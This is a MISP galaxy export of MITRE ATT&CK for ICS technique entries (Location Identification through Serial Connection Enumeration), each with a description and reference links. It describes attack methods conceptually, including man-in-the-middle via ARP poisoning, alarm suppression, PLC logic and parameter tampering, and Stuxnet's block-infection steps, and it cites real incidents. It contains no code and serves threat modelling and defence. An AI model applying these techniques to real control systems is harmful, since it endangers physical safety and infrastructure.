Adversaries may perform location identification using device data to inform operations and targeted impact for attacks. Location identification data can come in a number of forms, including geographic location, location relative to other control system devices, time zone, and current time. An adversary may use an embedded global positioning system (GPS) module in a device to figure out the physical coordinates of a device. NIST SP800-82 recommends that devices utilize GPS or another location determining mechanism to attach appropriate timestamps to log entries1. While this assists in logging and event tracking, an adversary could use the underlying positioning mechanism to determine the general location of a device. An adversary can also infer the physical location of serially connected devices by using serial connection enumeration. An adversary attempt to attack and cause Impact could potentially affect other control system devices in close proximity. Device local-time and time-zone settings can also provide adversaries a rough indicator of device location, when specific geographic identifiers cannot be determined from the system.

The tag is: misp-galaxy:mitre-ics-techniques="Location Identification"

Table 6957. Table References

Links

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

https://ics-cert.us-cert.gov/advisories/ICSA-14-178-01

https://www.f-secure.com/weblog/archives/00002718.html

Loss of Productivity and Revenue

Adversaries may cause loss of productivity and revenue through disruption and even damage to the availability and integrity of control system operations, devices, and related processes. This technique may manifest as a direct effect of an ICS-targeting attack or tangentially, due to an IT-targeting attack against non-segregated environments. In some cases, this may result from the postponement and disruption of ICS operations and production as part of a remediation effort. Operations may be brought to a halt and effectively stopped in an effort to contain and properly remove malware or due to the Loss of Safety.

The tag is: misp-galaxy:mitre-ics-techniques="Loss of Productivity and Revenue"

Table 6960. Table References

Links

https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/

https://news.softpedia.com/news/on-chernobyl-s-30th-anniversary-malware-shuts-down-german-nuclear-power-plant-503429.shtml

https://doublepulsar.com/how-lockergoga-took-down-hydro-ransomware-used-in-targeted-attacks-aimed-at-big-business-c666551f5880

https://www.hydro.com/en/media/on-the-agenda/cyber-attack/

https://www.bloomberg.com/news/features/2019-12-03/merck-cyberattack-s-1-3-billion-question-was-it-an-act-of-war

https://www.darkreading.com/attacks-breaches/how-a-manufacturing-firm-recovered-from-a-devastating-ransomware-attack/d/d-id/1334760

Loss of Safety

Adversaries may cause loss of safety whether on purpose or as a consequence of actions taken to accomplish an operation. The loss of safety can describe a physical impact and threat, or the potential for unsafe conditions and activity in terms of control systems environments, devices, or processes. For instance, an adversary may issue commands or influence and possibly inhibit safety mechanisms that allow the injury of and possible loss of life. This can also encompass scenarios resulting in the failure of a safety mechanism or control, that may lead to unsafe and dangerous execution and outcomes of physical processes and related systems. The German Federal Office for Information Security (BSI) reported a targeted attack on a steel mill in its 2014 IT Security Report. These targeted attacks affected industrial operations and resulted in breakdowns of control system components and even entire installations. As a result of these breakdowns, massive impact resulted in damage and unsafe conditions from the uncontrolled shutdown of a blast furnace. A Polish student used a remote controller device to interface with the Lodz city tram system in Poland.567 Using this remote, the student was able to capture and replay legitimate tram signals. As a consequence, four trams were derailed and twelve people injured due to resulting emergency stops. The track controlling commands issued may have also resulted in tram collisions, a further risk to those on board and nearby the areas of impact.

The tag is: misp-galaxy:mitre-ics-techniques="Loss of Safety"

Table 6961. Table References

Links

https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf

https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297

https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false

https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/Securitysituation/IT-Security-Situation-in-Germany-2014.pdf?blob=publicationFile&v=3

https://www.londonreconnections.com/2017/hacked-cyber-security-railways/

https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/

https://www.schneier.com/blog/archives/2008/01/hacking_the_pol.html

https://dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf

https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html

Man in the Middle

Adversaries with privileged network access may seek to modify network traffic in real time using man-in-the-middle (MITM) attacks. This type of attack allows the adversary to intercept traffic to and/or from a particular device on the network. If a MITM attack is established, then the adversary has the ability to block, log, modify, or inject traffic into the communication stream. There are several ways to accomplish this attack, but some of the most-common are Address Resolution Protocol (ARP) poisoning and the use of a proxy. A MITM attack may allow an adversary to perform the following attacks: Block Reporting Message, Modify Parameter, Unauthorized Command Message, Spoof Reporting Message

The tag is: misp-galaxy:mitre-ics-techniques="Man in the Middle"

Table 6963. Table References

Links

https://www.sans.org/reading-room/whitepapers/ICS/man-in-the-middle-attack-modbus-tcp-illustrated-wireshark-38095

http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258

https://dragos.com/resource/hexane/

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Manipulate I/O Image

Adversaries may manipulate the I/O image of PLCs through various means to prevent them from functioning as expected. Methods of I/O image manipulation may include overriding the I/O table via direct memory manipulation or using the override function used for testing PLC programs. During the PLC scan cycle, the state of the actual physical inputs is copied to a portion of the PLC memory, commonly called the input image table. When the program is scanned, it examines the input image table to read the state of a physical input. When the logic determines the state of a physical output, it writes to a portion of the PLC memory commonly called the output image table. The output image may also be examined during the program scan. To update the physical outputs, the output image table contents are copied to the physical outputs after the program is scanned. One of the unique characteristics of PLCs is their ability to override the status of a physical discrete input or to override the logic driving a physical output coil and force the output to a desired status.

The tag is: misp-galaxy:mitre-ics-techniques="Manipulate I/O Image"

Table 6964. Table References

Links

https://www.isa.org/standards-and-publications/isa-publications/intech/2010/december/programmable-logic-controller-hardware/

https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

Manipulation of Control

Adversaries may manipulate physical process control within the industrial environment. Methods of manipulating control can include changes to set point values, tags, or other parameters. Adversaries may manipulate control systems devices or possibly leverage their own, to communicate with and command physical control processes. The duration of manipulation may be temporary or longer sustained, depending on operator detection. Methods of Manipulation of Control include: Man-in-the-middle, Spoof command message, Changing setpoints

The tag is: misp-galaxy:mitre-ics-techniques="Manipulation of Control"

Table 6965. Table References

Links

Stuxnet can reprogram a PLC and change critical parameters in such a way that legitimate commands can be overridden or intercepted. In addition, Stuxnet can apply inappropriate command sequences or parameters to cause damage to property.[Stuxnet can reprogram a PLC and change critical parameters in such a way that legitimate commands can be overridden or intercepted. In addition, Stuxnet can apply inappropriate command sequences or parameters to cause damage to property.]

Masquerading

Adversaries may use masquerading to disguise a malicious application or executable as another file, to avoid operator and engineer suspicion. Possible disguises of these masquerading files can include commonly found programs, expected vendor executables and configuration files, and other commonplace application and naming conventions. By impersonating expected and vendor-relevant files and applications, operators and engineers may not notice the presence of the underlying malicious content and possibly end up running those masquerading as legitimate functions. Applications and other files commonly found on Windows systems or in engineering workstations have been impersonated before. This can be as simple as renaming a file to effectively disguise it in the ICS environment.

The tag is: misp-galaxy:mitre-ics-techniques="Masquerading"

Table 6966. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html

Modify Alarm Settings

Adversaries may modify alarm settings to prevent alerts that may inform operators of their presence or to prevent responses to dangerous and unintended scenarios. Reporting messages are a standard part of data acquisition in control systems. Reporting messages are used as a way to transmit system state information and acknowledgements that specific actions have occurred. These messages provide vital information for the management of a physical process, and keep operators, engineers, and administrators aware of the state of system devices and physical processes. If an adversary is able to change the reporting settings, certain events could be prevented from being reported. This type of modification can also prevent operators or devices from performing actions to keep the system in a safe state. If critical reporting messages cannot trigger these actions then a Impact could occur. In ICS environments, the adversary may have to use Alarm Suppression or contend with multiple alarms and/or alarm propagation to achieve a specific goal to evade detection or prevent intended responses from occurring. Methods of suppression often rely on modification of alarm settings, such as modifying in memory code to fixed values or tampering with assembly level instruction code. In the Maroochy Attack, the adversary disabled alarms at four pumping stations. This caused alarms to not be reported to the central computer.

The tag is: misp-galaxy:mitre-ics-techniques="Modify Alarm Settings"

Table 6967. Table References

Links

https://troopers.de/downloads/troopers19/TROOPERS19_NGI_IoT_diet_poisoned_fruit.pdf

https://www.mitre.org/sites/default/files/pdf/08_1145.pdf

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Modify Control Logic

Adversaries may place malicious code in a system, which can cause the system to malfunction by modifying its control logic. Control system devices use programming languages (e.g. relay ladder logic) to control physical processes by affecting actuators, which cause machines to operate, based on environment sensor readings. These devices often include the ability to perform remote control logic updates. Program code is normally edited in a vendor-specific Integrated Development Environment (IDE) that relies on proprietary tools and features. These IDEs allow an engineer to perform host target development and may have the ability to run the code on the machine it is programmed for. The IDE will transmit the control logic to the testing device, and will perform the required device-specific functions to apply the changes and make them active. An adversary may attempt to use this host target IDE to modify device control logic. Even though proprietary tools are often used to edit and update control logic, the process can usually be reverse-engineered and reproduced with open-source tools. An adversary can de-calibrate a sensor by removing functions in control logic that account for sensor error. This can be used to change a control process without actually spoofing command messages to a controller or device. It is believed this process happened in the lesser known over-pressurizer attacks build into Stuxnet. Pressure sensors are not perfect at translating pressure into an analog output signal, but their errors can be corrected by calibration. The pressure controller can be told what the “real” pressure is for given analog signals and then automatically linearize the measurement to what would be the “real” pressure. If the linearization is overwritten by malicious code on the S7-417 controller, analog pressure readings will be “corrected” during the attack by the pressure controller, which then interprets all analog pressure readings as perfectly normal pressure no matter how high or low their analog values are. The pressure controller then acts accordingly by never opening the stage exhaust valves. In the meantime, actual pressure keeps rising. In the Maroochy Attack, Vitek Boden gained remote computer access to the control system and altered data so that whatever function should have occurred at affected pumping stations did not occur or occurred in a different way. The software program installed in the laptop was one developed by Hunter Watertech for its use in changing configurations in the PDS computers. This ultimately led to 800,000 liters of raw sewage being spilled out into the community.

The tag is: misp-galaxy:mitre-ics-techniques="Modify Control Logic"

Table 6968. Table References

Links

https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf

https://www.mitre.org/sites/default/files/pdf/08_1145.pdf

https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Modify Parameter

Adversaries may modify parameters used to instruct industrial control system devices. These devices operate via programs that dictate how and when to perform actions based on such parameters. Such parameters can determine the extent to which an action is performed and may specify additional options. For example, a program on a control system device dictating motor processes may take a parameter defining the total number of seconds to run that motor. An adversary can potentially modify these parameters to produce an outcome outside of what was intended by the operators. By modifying system and process critical parameters, the adversary may cause Impact to equipment and/or control processes. Modified parameters may be turned into dangerous, out-of-bounds, or unexpected values from typical operations. For example, specifying that a process run for more or less time than it should, or dictating an unusually high, low, or invalid value as a parameter. In the Maroochy Attack, Vitek Boden gained remote computer access to the control system and altered data so that whatever function should have occurred at affected pumping stations did not occur or occurred in a different way. The software program installed in the laptop was one developed by Hunter Watertech for its use in changing configurations in the PDS computers. This ultimately led to 800,000 liters of raw sewage being spilled out into the community.

The tag is: misp-galaxy:mitre-ics-techniques="Modify Parameter"

Table 6969. Table References

Links

https://www.mitre.org/sites/default/files/pdf/08_1145.pdf

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Module Firmware

Adversaries may install malicious or vulnerable firmware onto modular hardware devices. Control system devices often contain modular hardware devices. These devices may have their own set of firmware that is separate from the firmware of the main control system equipment. This technique is similar to System Firmware, but is conducted on other system components that may not have the same capabilities or level of integrity checking. Although it results in a device re-image, malicious device firmware may provide persistent access to remaining devices. An easy point of access for an adversary is the Ethernet card, which may have its own CPU, RAM, and operating system. The adversary may attack and likely exploit the computer on an Ethernet card. Exploitation of the Ethernet card computer may enable the adversary to accomplish additional attacks, such as the following: Delayed Attack - The adversary may stage an attack in advance and choose when to launch it, such as at a particularly damaging time. Brick the Ethernet Card - Malicious firmware may be programmed to result in an Ethernet card failure, requiring a factory return. Random Attack or Failure - The adversary may load malicious firmware onto multiple field devices. Execution of an attack and the time it occurs is generated by a pseudo-random number generator. A Field Device Worm - The adversary may choose to identify all field devices of the same model, with the end goal of performing a device-wide compromise. Attack Other Cards on the Field Device - Although it is not the most important module in a field device, the Ethernet card is most accessible to the adversary and malware. Compromise of the Ethernet card may provide a more direct route to compromising other modules, such as the CPU module.

The tag is: misp-galaxy:mitre-ics-techniques="Module Firmware"

Table 6970. Table References

Links

https://www.researchgate.net/publication/228849043_Leveraging_ethernet_card_vulnerabilities_in_field_devices

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Monitor Process State

Adversaries may gather information about the physical process state. This information may be used to gain more information about the process itself or used as a trigger for malicious actions. The sources of process state information may vary such as, OPC tags, historian data, specific PLC block information, or network traffic.

The tag is: misp-galaxy:mitre-ics-techniques="Monitor Process State"

Table 6971. Table References

Links

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Network Connection Enumeration

Adversaries may perform network connection enumeration to discover information about device communication patterns. If an adversary can inspect the state of a network connection with tools, such as netstat, in conjunction with System Firmware, then they can determine the role of certain devices on the network. The adversary can also use Network Sniffing to watch network traffic for details about the source, destination, protocol, and content.

The tag is: misp-galaxy:mitre-ics-techniques="Network Connection Enumeration"

Table 6972. Table References

Links

https://attack.mitre.org/wiki/Technique/T1049

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Network Service Scanning

Network Service Scanning is the process of discovering services on networked systems. This can be achieved through a technique called port scanning or probing. Port scanning interacts with the TCP/IP ports on a target system to determine whether ports are open, closed, or filtered by a firewall. This does not reveal the service that is running behind the port, but since many common services are run on specific port numbers, the type of service can be assumed. More in-depth testing includes interaction with the actual service to determine the service type and specific version. One of the most-popular tools to use for Network Service Scanning is Nmap. An adversary may attempt to gain information about a target device and its role on the network via Network Service Scanning techniques, such as port scanning. Network Service Scanning is useful for determining potential vulnerabilities in services on target devices. Network Service Scanning is closely tied to. Scanning ports can be noisy on a network. In some attacks, adversaries probe for specific ports using custom tools. This was specifically seen in the Triton and PLC-Blaster attacks.

The tag is: misp-galaxy:mitre-ics-techniques="Network Service Scanning"

Table 6973. Table References

Links

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Network Sniffing

Network sniffing is the practice of using a network interface on a computer system to monitor or capture information1 regardless of whether it is the specified destination for the information. An adversary may attempt to sniff the traffic to gain information about the target. This information can vary in the level of importance. Relatively unimportant information is general communications to and from machines. Relatively important information would be login information. User credentials may be sent over an unencrypted protocol, such as Telnet, that can be captured and obtained through network packet analysis. Network sniffing can be a way to discover information for Control Device Identification. In addition, ARP and Domain Name Service (DNS) poisoning can be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.

The tag is: misp-galaxy:mitre-ics-techniques="Network Sniffing"

Table 6974. Table References

Links

https://attack.mitre.org/wiki/Technique/T1040

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

https://blog.talosintelligence.com/2018/06/vpnfilter-update.html

https://www.youtube.com/watch?v=yuZazP22rpI

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

https://technet.microsoft.com/en-us/library/ee791851.aspx

Point & Tag Identification

Adversaries may collect point and tag values to gain a more comprehensive understanding of the process environment. Points may be values such as inputs, memory locations, outputs or other process specific variables.1 Tags are the identifiers given to points for operator convenience. Collecting such tags provides valuable context to environmental points and enables an adversary to map inputs, outputs, and other values to their control processes. Understanding the points being collected may inform an adversary on which processes and values to keep track of over the course of an operation.

The tag is: misp-galaxy:mitre-ics-techniques="Point & Tag Identification"

Table 6975. Table References

Links

Backdoor.Oldrea enumerates all OPC tags and queries for specific fields such as server state, tag name, type, access, and id[Backdoor.Oldrea enumerates all OPC tags and queries for specific fields such as server state, tag name, type, access, and id]

https://www.fireeye.com/blog/threat-research/2014/07/havex-its-down-with-opc.html

Program Download

Adversaries may perform a program download to load malicious or unintended program logic on a device as a method of persistence or to disrupt response functions or process control. Program download onto devices, such as PLCs, allows adversaries to implement custom logic. Malicious PLC programs may be used to disrupt physical processes or enable adversary persistence. The act of a program download will cause the PLC to enter a STOP operation state, which may prevent response functions from operating correctly.

The tag is: misp-galaxy:mitre-ics-techniques="Program Download"

Table 6976. Table References

Links

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware

Program Organization Units

Program Organizational Units (POUs) are block structures used within PLC programming to create programs and projects. POUs can be used to hold user programs written in IEC 61131-3 languages: Structured text, Instruction list, Function block, and Ladder logic. They can also provide additional functionality, such as establishing connections between the PLC and other devices using TCON. Stuxnet uses a simple code-prepending infection technique to infect Organization Blocks (OB). For example, the following sequence of actions is performed when OB1 is infected: Increase the size of the original block. Write malicious code to the beginning of the block. Insert the original OB1 code after the malicious code.

The tag is: misp-galaxy:mitre-ics-techniques="Program Organization Units"

Table 6977. Table References

Links

Stuxnet infects PLCs with different code depending on the characteristics of the target system. An infection sequence consists of code blocks and data blocks that will be downloaded to the PLC to alter its behavior.[Stuxnet infects PLCs with different code depending on the characteristics of the target system. An infection sequence consists of code blocks and data blocks that will be downloaded to the PLC to alter its behavior.]

https://cdn.selinc.com/assets/Literature/Publications/Technical%20Papers/6560_PracticalApplications_MW_20120224_Web.pdf?v=20151125-003051

https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

Program Upload

Adversaries may attempt to upload a program from a PLC to gather information about an industrial process. Uploading a program may allow them to acquire and study the underlying logic. Methods of program upload include vendor software, which enables the user to upload and read a program running on a PLC. This software can be used to upload the target program to a workstation, jump box, or an interfacing device.

The tag is: misp-galaxy:mitre-ics-techniques="Program Upload"

Table 6978. Table References

Links

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

Project File Infection

Adversaries may attempt to infect project files with malicious code. These project files may consist of objects, program organization units, variables such as tags, documentation, and other configurations needed for PLC programs to function. Using built in functions of the engineering software, adversaries may be able to download an infected program to a PLC in the operating environment enabling further execution and persistence techniques. Adversaries may export their own code into project files with conditions to execute at specific intervals.3 Malicious programs allow adversaries control of all aspects of the process enabled by the PLC. Once the project file is downloaded to a PLC the workstation device may be disconnected with the infected project file still executing.

The tag is: misp-galaxy:mitre-ics-techniques="Project File Infection"

Table 6979. Table References

Links

https://infosys.beckhoff.com/english.php?content=../content/1033/tc3_sourcecontrol/18014398915785483.html&id=

http://www.plcdev.com/book/export/html/373

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

Remote File Copy

Adversaries may copy files from one system to another to stage adversary tools or other files over the course of an operation. Copying of files may also be performed laterally between internal victim systems to support Lateral Movement with remote Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares. In control systems environments, malware may use SMB and other file sharing protocols to move laterally through industrial networks.

The tag is: misp-galaxy:mitre-ics-techniques="Remote File Copy"

Table 6980. Table References

Links

WannaCry can move laterally through industrial networks by means of the SMB service.[WannaCry can move laterally through industrial networks by means of the SMB service.]

https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/

Remote System Discovery

Remote System Discovery is the process of identifying the presence of hosts on a network1, and details about them. This process is common to network administrators validating the presence of machines and services, as well as adversaries mapping out a network for future-attack targets. An adversary may attempt to gain information about the target network via network enumeration techniques such as port scanning. One of the most popular tools for enumeration is Nmap. Remote System Discovery allows adversaries to map out hosts on the network as well as the TCP/IP ports that are open, closed, or filtered. Remote System Discovery tools also aid in by attempting to connect to the service and determine its exact version. The adversary may use this information to pick an exploit for a particular version if a known vulnerability exists.

The tag is: misp-galaxy:mitre-ics-techniques="Remote System Discovery"

Table 6981. Table References

Links

https://attack.mitre.org/wiki/Technique/T1018

https://pdfs.semanticscholar.org/18df/43ef1690b0fae15a36f770001160aefbc6c5.pdf

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20B%29.pdf

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Replication Through Removable Media

Adversaries may move onto systems, such as those separated from the enterprise network, by copying malware to removable media which is inserted into the control systems environment. The adversary may rely on unknowing trusted third parties, such as suppliers or contractors with access privileges, to introduce the removable media. This technique enables initial access to target devices that never connect to untrusted networks, but are physically accessible. Operators of the German nuclear power plant, Gundremmingen, discovered malware on a facility computer not connected to the internet. The malware included Conficker and W32.Ramnit, which were also found on eighteen removable disk drives in the facility. The plant has since checked for infection and cleaned up more than 1,000 computers.9 An ESET researcher commented that internet disconnection does not guarantee system safety from infection or payload execution.

The tag is: misp-galaxy:mitre-ics-techniques="Replication Through Removable Media"

Table 6982. Table References

Links

https://www.kkw-gundremmingen.de/presse.php?id=571

Stuxnet was able to self-replicate by being spread through removable drives. A willing insider or unknown third party, such as a contractor, may have brought the removable media into the target environment.12 The earliest version of Stuxnet relied on physical installation, infecting target systems when an infected configuration file carried by a USB stick was opened.[Stuxnet was able to self-replicate by being spread through removable drives. A willing insider or unknown third party, such as a contractor, may have brought the removable media into the target environment.12 The earliest version of Stuxnet relied on physical installation, infecting target systems when an infected configuration file carried by a USB stick was opened.]

https://www.reuters.com/article/us-nuclearpower-cyber-germany/german-nuclear-plant-infected-with-computer-viruses-operator-says-idUSKCN0XN2OS

https://news.softpedia.com/news/on-chernobyl-s-30th-anniversary-malware-shuts-down-german-nuclear-power-plant-503429.shtml

https://www.sciencealert.com/multiple-computer-viruses-have-been-discovered-in-this-german-nuclear-plant

https://www.geek.com/apps/german-nuclear-plant-found-riddled-with-conficker-other-viruses-1653415/

https://arstechnica.com/information-technology/2016/04/german-nuclear-plants-fuel-rod-system-swarming-with-old-malware/

https://www.darkreading.com/endpoint/german-nuclear-power-plant-infected-with-malware/d/d-id/1325298

https://www.bbc.com/news/technology-36158606

https://www.welivesecurity.com/2016/04/28/malware-found-german-nuclear-power-plant/

https://support.symantec.com/us/en/article.tech93179.html

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf

Rogue Master Device

Adversaries may setup a rogue master to leverage control server functions to communicate with slave devices. A rogue master device can be used to send legitimate control messages to other control system devices, affecting processes in unintended ways. It may also be used to disrupt network communications by capturing and receiving the network traffic meant for the actual master device. Impersonating a master device may also allow an adversary to avoid detection. In the Maroochy Attack, Vitek Boden falsified network addresses in order to send false data and instructions to pumping stations.

The tag is: misp-galaxy:mitre-ics-techniques="Rogue Master Device"

Table 6983. Table References

Links

https://www.mitre.org/sites/default/files/pdf/08_1145.pdf

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

https://technet.microsoft.com/en-us/library/ee791851.aspx

Role Identification

Adversaries may perform role identification of devices involved with physical processes of interest in a target control system. Control systems devices often work in concert to control a physical process. Each device can have one or more roles that it performs within that control process. By collecting this role-based data, an adversary can construct a more targeted attack. For example, a power generation plant may have unique devices such as one that monitors power output of a generator and another that controls the speed of a turbine. Examining devices roles allows the adversary to observe how the two devices work together to monitor and control a physical process. Understanding the role of a target device can inform the adversary’s decision on what action to take, in order to cause Impact and influence or disrupt the integrity of operations. Furthermore, an adversary may be able to capture control system protocol traffic. By studying this traffic, the adversary may be able to determine which devices are outstations, and which are masters. Understanding of master devices and their role within control processes can enable the use of Rogue Master Device.

The tag is: misp-galaxy:mitre-ics-techniques="Role Identification"

Table 6984. Table References

Links

Ensure ICS and IT network cables are kept separate and that devices are locked up when possible, to reduce the likelihood they can be tampered with.[Ensure ICS and IT network cables are kept separate and that devices are locked up when possible, to reduce the likelihood they can be tampered with.]

https://www.f-secure.com/weblog/archives/00002718.html

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Rootkit

Adversaries may deploy rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting and modifying operating-system API calls that supply system information. Rootkits or rootkit-enabling functionality may reside at the user or kernel level in the operating system, or lower. Firmware rootkits that affect the operating system yield nearly full control of the system. While firmware rootkits are normally developed for the main processing board, they can also be developed for I/O that can be attached to the asset. Compromise of this firmware allows the modification of all of the process variables and functions the module engages in. This may result in commands being disregarded and false information being fed to the main device. By tampering with device processes, an adversary may inhibit its expected response functions and possibly enable Impact.

The tag is: misp-galaxy:mitre-ics-techniques="Rootkit"

Table 6985. Table References

Links

https://attack.mitre.org/wiki/Technique/T1014

https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

https://technet.microsoft.com/en-us/library/ee791851.aspx

Screen Capture

Adversaries may attempt to perform screen capture of devices in the control system environment. Screenshots may be taken of workstations, HMIs, or other devices that display environment-relevant process, device, reporting, alarm, or related data. These device displays may reveal information regarding the ICS process, layout, control, and related schematics. In particular, an HMI can provide a lot of important industrial process information. Analysis of screen captures may provide the adversary with an understanding of intended operations and interactions between critical devices.

The tag is: misp-galaxy:mitre-ics-techniques="Screen Capture"

Table 6986. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA17-293A

https://dragos.com/resource/allanite/

https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html

https://www.symantec.com/security-center/writeup/2017-030708-4403-99

Scripting

Adversaries may use scripting languages to execute arbitrary code in the form of a pre-written script or in the form of user-supplied code to an interpreter. Scripting languages are programming languages that differ from compiled languages, in that scripting languages use an interpreter, instead of a compiler. These interpreters read and compile part of the source code just before it is executed, as opposed to compilers, which compile each and every line of code to an executable file. Scripting allows software developers to run their code on any system where the interpreter exists. This way, they can distribute one package, instead of precompiling executables for many different systems. Scripting languages, such as Python, have their interpreters shipped as a default with many Linux distributions. In addition to being a useful tool for developers and administrators, scripting language interpreters may be abused by the adversary to execute code in the target environment. Due to the nature of scripting languages, this allows for weaponized code to be deployed to a target easily, and leaves open the possibility of on-the-fly scripting to perform a task.

The tag is: misp-galaxy:mitre-ics-techniques="Scripting"

Table 6987. Table References

Links

https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage

https://dragos.com/resource/magnallium/

https://www.securityweek.com/researchers-analyze-tools-used-hexane-attackers-against-industrial-firms

https://www.bankinfosecurity.com/lyceum-apt-group-new-threat-to-oil-gas-companies-a-13003

https://unit42.paloaltonetworks.com/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/

https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20B%29.pdf

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Serial Connection Enumeration

Adversaries may perform serial connection enumeration to gather situational awareness after gaining access to devices in the OT network. Control systems devices often communicate to each other via various types of serial communication mediums. These serial communications are used to facilitate informational communication, as well as commands. Serial Connection Enumeration differs from I/O Module Discovery, as I/O modules are auxiliary systems to the main system, and devices that are connected via serial connection are normally discrete systems. While IT and OT networks may work in tandem, the exact structure of the OT network may not be discernible from the IT network alone. After gaining access to a device on the OT network, an adversary may be able to enumerate the serial connections. From this perspective, the adversary can see the specific physical devices to which the compromised device is connected to. This gives the adversary greater situational awareness and can influence the actions that the adversary can take in an attack.

The tag is: misp-galaxy:mitre-ics-techniques="Serial Connection Enumeration"

